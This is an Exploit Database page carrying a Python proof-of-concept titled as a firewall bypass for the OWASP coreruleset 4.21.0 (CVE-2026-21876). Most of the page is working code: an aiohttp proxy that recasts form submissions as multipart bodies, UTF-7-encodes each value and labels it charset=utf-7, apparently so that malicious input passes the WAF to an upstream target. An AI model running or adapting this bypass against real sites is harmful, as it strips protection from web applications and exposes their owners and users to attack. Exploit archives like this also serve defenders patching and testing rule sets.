This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING coreruleset 4.21.0 - Firewall Bypass EDB-ID: 52558 CVE: 2026-21876 EDB Verified: Author: ANONIMICERUM Type: WEBAPPS Exploit: / Platform: MULTIPLE Date: 2026-05-13 Vulnerable App: # Exploit Title: coreruleset 4.21.0 - Firewall Bypass # Date:* 04/08/2026* # Exploit Author: Daytrift Newgen # Vendor Homepage: https://github.com/coreruleset # Software Link: https://github.com/coreruleset/coreruleset # Version: < 4.22.0/3.3.8 # Tested on: Fedora, MacOS # CVE : CVE-2026-21876 import base64 import os from cgi import parse_header from urllib.parse import parse_qsl from aiohttp import web, ClientSession, MultipartWriter from yarl import URL # Target UPSTREAM = os.getenv("UPSTREAM", "http://host:8083") HOP_BY_HOP_HEADERS = { "connection", "keep-alive", "proxy-authenticate", "proxy-authorization", "te", "trailer", "transfer-encoding", "upgrade", } def _make_upstream_url(request): base = URL(UPSTREAM) return str( base.with_path(request.rel_url.path).with_query(request.rel_url.query) ) def _copy_headers_for_upstream(request): headers: dict[str, str] = {} for k, v in request.headers.items(): lk = k.lower() if lk in HOP_BY_HOP_HEADERS: continue if lk in {"host", "content-length"}: continue if lk == "content-type": continue headers[k] = v return headers def _utf7_encode(text): result = b"" for char in text: utf16_bytes = char.encode('utf-16-be') b64 = base64.b64encode(utf16_bytes).rstrip(b'=') result += b'+' + b64 + b'-' return result def _form_urlencoded_to_multipart(body, content_type): _, params = parse_header(content_type or "") charset = params.get("charset", "utf-8") text = body.decode(charset, errors="replace") pairs = parse_qsl(text, keep_blank_values=True, strict_parsing=False, encoding=charset, errors="replace") mp = MultipartWriter("form-data") for key, value in pairs: part = mp.append(_utf7_encode(value)) part.headers["Content-Type"] = "text/plain; charset=utf-7" part.set_content_disposition("form-data", name=key) part2 = mp.append('a'.encode("utf-8")) part2.set_content_disposition("form-data", name="aBdC401") part2.headers["Content-Type"] = "text/plain; charset=utf-8" return mp, mp.content_type async def handle(request): upstream_url = _make_upstream_url(request) headers = _copy_headers_for_upstream(request) content_type = request.headers.get("Content-Type", "") body = await request.read() data = body if content_type.startswith("application/x-www-form-urlencoded"): mp, mp_content_type = _form_urlencoded_to_multipart(body, content_type) data = mp headers["Content-Type"] = mp_content_type async with request.app["session"].request( method=request.method, url=upstream_url, headers=headers, data=data, allow_redirects=False, # proxy="http://127.0.0.1:8080", ) as resp: resp_body = await resp.read() response_headers = { k: v for k, v in resp.headers.items() if k.lower() not in HOP_BY_HOP_HEADERS } return web.Response( status=resp.status, headers=response_headers, body=resp_body, ) async def on_startup(app): app["session"] = ClientSession() async def on_cleanup(app): await app["session"].close() app = web.Application(client_max_size=50 * 1024 * 1024) app.router.add_route("*", "/{tail:.*}", handle) app.on_startup.append(on_startup) app.on_cleanup.append(on_cleanup) if __name__ == "__main__": # Local proxy web.run_app(app, host="0.0.0.0", port=8085) Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.